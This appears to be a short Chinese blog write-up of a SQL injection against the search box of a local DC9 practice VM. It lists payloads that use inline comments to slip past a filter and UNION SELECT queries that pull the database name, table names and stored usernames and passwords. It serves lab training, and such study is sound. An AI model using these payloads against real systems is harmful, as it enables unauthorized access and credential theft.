简单的sql注入绕过

一、前言

群里一位师傅遇到了本地靶场sql注入的问题,判断出注入但是无法进行下一步,sqlmap也是跑不了。

二、过程

通过跟师傅交流大概知道了是什么问题,并通过向日葵远程师傅的电脑。

本地搭建的DC9靶机:

搜索框注入:

搜索Mark正常输出用户信息,加'则不输出信息,加#则输出信息,从而得知存在sql注入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Mark		正常输出用户信息
Mark' 不输出信息
Mark'# 正常输出用户信息
从而得知存在sql注入
Mark' order by 5# 无论在'#里输入任何语句都返回错误,导致判断不了字段,怀疑存在过滤行为。
使用内联注释绕过
Mark'/**/order/**/by/**/6# 返回正常
Mark'/**/order/**/by/**/7# 返回错误
从而得知字段为6
Mark'/**/union/**/select/**/1,2,3,4,5,6#
页面中得到返回数据值2等等....
查询数据库名:
Mark'/**/union/**/select/**/1,database(),3,4,5,6# 得到数据库

Mark'/**/union/**/select/**/1,group_concat(table_name),3,4,5,6/**/from/**/information_schema.tables/**/where /**/table_schema='数据库名'# 得到数据库中的表

Mark'/**/union/**/select/**/1,group_concat(Username,Password),3,4,5,6/**/from/**/User# 得到字段信息


简单的sql注入绕过
https://nan-918.github.io/2022/05/02/sql/
作者
Nan-911
发布于
2022年5月2日
许可协议